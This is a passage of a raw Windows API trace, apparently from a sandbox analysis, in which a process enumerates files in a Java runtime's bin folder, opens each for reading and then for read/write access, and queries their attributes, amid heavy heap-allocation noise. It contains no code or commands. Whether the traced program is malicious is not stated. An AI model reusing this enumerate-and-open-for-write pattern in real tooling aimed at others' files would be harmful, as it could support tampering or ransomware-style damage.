(HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0093.656] AreFileApisANSI () returned 1 [0093.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0093.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x466d8 [0093.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x466d8, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\resource.dll") returned 52 [0093.657] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\resource.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\resource.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.657] GetFileType (hFile=0x360) returned 0x1 [0093.657] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x466d8 | out: hHeap=0x20000) returned 1 [0093.657] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.657] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.657] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.657] CloseHandle (hObject=0x360) returned 1 [0093.658] AreFileApisANSI () returned 1 [0093.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0093.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x460b8 [0093.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x460b8, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\resource.dll") returned 52 [0093.658] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\resource.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\resource.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.658] GetFileType (hFile=0x360) returned 0x1 [0093.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0093.658] CloseHandle (hObject=0x360) returned 1 [0093.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0093.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0093.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.659] AreFileApisANSI () returned 1 [0093.659] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0093.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45ef8 [0093.659] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x45ef8, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\resource.dll") returned 52 [0093.659] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\resource.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\resource.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8a148fe, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8a148fe, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8a148fe, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3c40)) returned 1 [0093.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45ef8 | out: hHeap=0x20000) returned 1 [0093.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0093.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0093.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0093.659] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.659] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.659] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8a148fe, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8a148fe, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8a148fe, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3e40, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="rmid.exe", cAlternateFileName="")) returned 1 [0093.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0093.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0093.660] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0093.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0093.660] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0093.660] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0093.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0093.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0093.660] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0093.660] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0093.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0093.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a630 [0093.660] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0093.660] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0093.660] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a630 | out: hHeap=0x20000) returned 1 [0093.660] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.660] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.660] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.660] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.660] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0093.660] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.660] AreFileApisANSI () returned 1 [0093.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmid.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmid.exe", lpUsedDefaultChar=0x0) returned 48 [0093.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0093.660] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.660] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0093.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0093.660] AreFileApisANSI () returned 1 [0093.661] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0093.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0093.661] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71828, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmid.exe") returned 48 [0093.661] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmid.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\rmid.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.661] GetFileType (hFile=0x360) returned 0x1 [0093.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0093.661] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.661] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.661] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.661] CloseHandle (hObject=0x360) returned 1 [0093.662] AreFileApisANSI () returned 1 [0093.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0093.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0093.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71c38, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmid.exe") returned 48 [0093.662] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmid.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\rmid.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.662] GetFileType (hFile=0x360) returned 0x1 [0093.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0093.662] CloseHandle (hObject=0x360) returned 1 [0093.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0093.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0093.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.663] AreFileApisANSI () returned 1 [0093.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0093.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0093.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmid.exe") returned 48 [0093.663] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmid.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\rmid.exe"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8a148fe, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8a148fe, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8a148fe, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3e40)) returned 1 [0093.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0093.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0093.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0093.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0093.663] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.663] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.663] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8a148fe, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8a148fe, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8af971e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="rmiregistry.exe", cAlternateFileName="RMIREG~1.EXE")) returned 1 [0093.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0093.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0093.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0093.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0093.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0093.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0093.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0093.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0093.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0093.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0093.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0093.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0093.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0093.664] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.664] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.664] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.664] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0093.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.664] AreFileApisANSI () returned 1 [0093.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmiregistry.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmiregistry.exe", lpUsedDefaultChar=0x0) returned 55 [0093.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0093.664] InitOnceExecuteOnce (in: 